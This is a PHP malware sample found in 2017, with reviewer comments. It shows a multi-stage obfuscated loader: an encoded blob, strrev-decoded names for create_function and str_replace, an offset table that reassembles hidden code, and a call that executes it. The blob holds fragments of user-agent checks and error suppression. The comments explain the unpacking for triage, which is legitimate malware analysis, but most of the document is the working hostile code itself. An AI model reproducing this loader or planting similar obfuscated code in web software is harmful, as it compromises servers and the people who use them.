PHP malware sample 2017/11/15
# This is a sample of PHP malware discovered on 2017/11/15.
# It unpacks at least 5 levels deep, and later levels reference variables defined by earlier levels of expansion.
# It has also been seen with other variable names and with altered constants.
<?php /* Stage-0 blob: one single-quoted literal that runs to the closing quote just before $vgkbclh. It is data, not code, until the stub below slices it; fragments readable inside it (@error_reporting(0), strtolower($_SERVER[...]), strstr($uas, ...), $GLOBALS[...]) belong to the next stage. NOTE(review): the " x61 156"-style runs look like escapes whose leading character was a tab in the raw file (the stub swaps chr(9) for chr(92)); this rendering shows spaces - confirm against the raw bytes. */ $awvjtnz = 'fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojnopm3qjA)qj3hopmA x273qj%6<*Y%)fnbozcYufhA x%=*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]3 x74 141 x72 164") && (!isset($GLOBALS[" x61 156 x75 156 x61"]h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!^<!Ce*[!%cIjQeTQcOc/#00o#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l} x27;%!<*#}_;#)323!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#* x24- x24!>! x24/%tjws:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>%s: x575983:48984:71]K9]77]D4]82]K6]72]K9]78]K5].;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`msvd}21]464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%bss x5csboe))/*)323zbe!-#jt0*?]+^?]_ x5c}X x24<!4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]7]y86]267]y74]275]y7:]268]y7f#<!%tww!>! x240w/ x24)##-!#~<#/% x24- x24!>!fyqmpef)# x24*<!%t::!>272qj%6<^#zsfvr# x5cq%7/6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]3 162 x65 141 x74 145 x5f 146 x772 145 x66 157 x78"))) { $oqtpxpv = " x6|:*r%:-t%)3of:opjudovg<~ x24<!%o:!>! x242178}527}88:}334}472 xw6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA x27&6<.fmjgA x27doj%6< x7y]252]18y]#>q%<#762]67y]5z)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn]y6d]281Ld]245]K2]285]Ke]53Ld672]48y]#>s%<#462]47d%6|6.7eu{66~67<&w6<*&7-#o]s]! x24Ypp3)%cB%iN}#-! x24/%tmw/ x24)%c*W%eN+#Qi x5c1^W%c!>!%i x5c2*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{C#-#O#-#N#*-!%ff2-!%]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]3I7jsv%7UFH# x27rfs%6~6< x7fw*127-UVPFNJU,6<*27-SFGTOBSUO#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#)% x24- x24*<!~! 
x24/%t2273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]x45 116 x54"]); if ((strstr($uas," x6d 163 x69 145")) or (strstr($)sfebfI{*w%)kVx{**#k#)tutjyf`x x22l:!}V;3q%}U;y]}R;2]},;osvufs} x2id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f x27,*e x2GMFT`QIQ&f_UTPI`QUUI&e_SEEB`jix6<C x27&6<*rfs%7-K)fw6* x7f_*#fmjgk4`{6~6<tfs%w6< x7fw6*CWtfs%)7gj6<*8]225]241]334]368]322]3]364]6]283]427]36]373P6]R17,67R37,#/q%>U<#16,47R57,27Rpd%6<pd%w6Z6<.3`hA x2 x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!g("", $jojtdkr); $bhlpzbl();}}W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t27ftbc x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq% x5cSFWSFT`%}X;!sp!*#op%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj x22)gj!|!*nbsbq%)32d($n)-1);} @error_reporting(0); $jojtdkr = implode(array_map("dudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{h3]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]256<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA x24- x24 x5c%j^ x24- x24tvctus)% x24- x24buas," x72 166 x3a 61 x31")) or (strstr($uas!gj}1~!<2p% x7f!~!<##!>!2p%Z<^1"]=1; $uas=strtolower($_SERVER[" x48 124 x5ldfid>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{eb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tmw/ x24)%zW%h>EzH,2)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~7;mnui}&;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! x24- x24gvodujpo! x24- xSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{666~6</ x24)% x24- x24y4 x24- x24]y8 x24- x24]26 x24- x24<%j,,*!| x2 x2272qj%)7gj6<**2qj%)h53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]Ddbqov>*ofmy%)utjm!|!*5! 
x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-if((function_exists(" x6f 142 x5f 16<.msv`ftsbqA7>q%6< x7fw6* x7f_*#fubfsdXk5`{66~6<&/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]276197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]epdof./#@#/qp%>5h%!<*::::::-1246767~6<Cw6<pd%w6Z6<.5`hA x27pd%6<pd%w6Z6<.4`hA x27fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUU0~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]27]28yW;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}%tmw!>!#]y84]275]y83]27~!%z!>2<!gps)%j>1<%j=6[%ww)))) { $GLOBALS[" x61 156 x75 156 x65 156 x63 164 x69 157 x6e"; function dhyvbmt($n){return chr(orx27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72! x27!hmg%tmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7ww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m," x61 156 x64 162 x6f 151 x64")) or (strstr($uas," x63 150 x72 +;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x7f;!osvufs}w;* x7f!>> x22!pd%)!gj}Z;W&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fm11112)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!7{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#27pd%6<pd%w6Z6<.2`hA x27pd%6<C x27p157 x6d 145")) or (strstr($uas," x66 151 xw)##Qtjw)#]82#-#!#-%tmw)%t#W~!Ydrr)%rxB%epnbss!>!bssb2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~ x&w6< x7fw6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}t::**<(<!fwbm)%tjw)# x24#-!#]y38#-!%w:**<")));$bhlpzbl = $oqtpxpv]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w:!>! x+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GB)fubfsdXA x27K6< x7fw6*3qj%7><+{e%+*!*+fepdfe{h+{d%)+opj/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b% x7f!<X>b66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#r# x5cq%)ufttj x22)gj6<^#Y# x5cq% x27Y%6K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:npd#)tutjyf`opjudovg x22)24y7 x24- x24*<! 
x24- x24gps)%j>1<%j=tj{fpgh1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4 x223}!+!o]s]#)fepmqyf x27*&7-n%)utjm6< x7fw6*C1/35.)1/14+9**-)1/2986+7**^c%j:^<!%w` x5c^>Ew:Qb:Qc:W24<!%ff2!>!bssbz) x24]25 x24- x24-!% x24- x24*!|! x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`62]38y]572]48y]#>m%:j!<*2bd%-#1GO x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%g)!gj<*#k#)usbut`cpV x7f x7f x7f x7f<u%V x27{f4 120 x5f 125 x53 105 x52 137 x41 107 24<!fwbm)%tjw)bssbz)#P#-#Q#-#Bhyvbmt",str_split("%tjw!>!#]y847,*d x27,*c x27,*b x27)fepdof.)f3ldfidk!~!<**qp%!-uyfu%)3of)fepdof`5<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)lhA!osvufs!~<3,j%>j%!*3! 248L3P6L1M5]D2P4]D6#<%G7#@#7/7^#iubq# x5cq% x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvStrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSopxkrbc'; /* Name table: chr(636-516) is "x", and substr(blob, 6020, 34) split on "x" yields three strings. The blob's visible tail "StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtS" is 34 characters and fits that shape. */ $vgkbclh=explode(chr((636-516)),substr($awvjtnz,(29027-23007),(198-164))); /* Entry 0 is called as a function on entries 1 and 2. With the tail above, entry 0 is "StrrEV" (strrev; PHP function names are case-insensitive) and the two results spell create_function and str_replace. */ $jdxccsyh = $vgkbclh[0]($vgkbclh[(7-6)]); $nkttprcq = $vgkbclh[0]($vgkbclh[(7-5)]); /* Slice-and-join helper; the function_exists() guard keeps a second copy of the stub from redeclaring it. */ if (!function_exists('huqbsiykq')) { function huqbsiykq($ewjaowa, $ppcmgty,$euscsfo) { $rputetgcppb = NULL; /* $ewjaowa is read as a flat list of offset,length pairs into $ppcmgty; the slices are appended in list order. */ for($blvfkqsfhf=0;$blvfkqsfhf<(sizeof($ewjaowa)/2);$blvfkqsfhf++) { $rputetgcppb .= substr($ppcmgty, $ewjaowa[($blvfkqsfhf*2)],$ewjaowa[($blvfkqsfhf*2)+(7-6)]); } /* chr(34-25) is TAB and chr(531-439) is a backslash: the callback (str_replace here) restores escape sequences only after reassembly, so no backslash escape appears in the file at rest. */ return $euscsfo(chr((34-25)),chr((531-439)),$rputetgcppb); }; } /* chr(213-169) is ","; the literal on the next line is the offset,length table. Its highest pair, 5965,55, ends at 6020, which is where the name table starts. */ $xozybdtes = 
explode(chr((213-169)),'3371,36,157,63,3931,36,2709,44,5708,38,1659,66,2636,43,4231,64,4563,42,868,40,836,32,3967,62,2332,63,5776,31,4847,58,3660,52,2063,20,4528,35,1170,29,5409,38,4365,58,1914,22,3712,42,1474,28,2555,41,5552,35,4949,31,3260,23,53,43,780,24,5965,55,5180,40,3407,49,970,62,1936,50,1791,45,1502,28,3132,66,4713,35,4748,34,3820,62,501,42,4295,70,220,37,1264,64,5918,24,4029,58,2990,53,5875,43,3315,56,640,45,2440,66,5283,25,2679,30,2083,33,5607,55,1836,50,5807,32,3631,29,4423,59,5007,45,0,53,2883,54,4905,44,1886,28,5052,69,2270,62,5839,36,2208,62,280,55,2753,70,2823,60,5351,58,4980,27,2395,45,5662,46,4087,59,2033,30,5121,59,1725,66,3043,67,4482,46,605,35,3882,23,2506,49,685,44,3754,66,4198,33,96,61,1150,20,1032,25,5587,20,908,62,5500,52,2596,40,335,57,3198,62,3110,22,5308,43,1581,24,729,51,1199,65,257,23,4631,27,1057,64,2937,53,2145,63,4605,26,4146,52,3567,64,5220,63,459,42,3283,32,804,32,1605,54,5942,23,1121,29,1348,61,3510,57,1986,47,1409,65,543,62,5447,27,3456,54,392,67,5474,26,3905,26,4658,55,5746,30,1530,51,1328,20,4782,65,2116,29'); /* Execution point: $jdxccsyh("", code) builds an anonymous function from the reassembled string and $ympifwn("") runs it. create_function() was deprecated in PHP 7.2 and removed in PHP 8.0, so this stub cannot run there. A variable-named call that receives string-built code is the pattern to look for when triaging similar files. */ $ympifwn = $jdxccsyh("",huqbsiykq($xozybdtes,$awvjtnz,$nkttprcq)); /* The blob is copied into $jdxccsyh before the call - presumably so the next stage can read it; verify against the unpacked code. */ $jdxccsyh=$awvjtnz; $ympifwn(""); /* After the call the loader variables are overwritten with the integers 121 and 120. */ $ympifwn=(599-478); $awvjtnz=$ympifwn-1; ?> |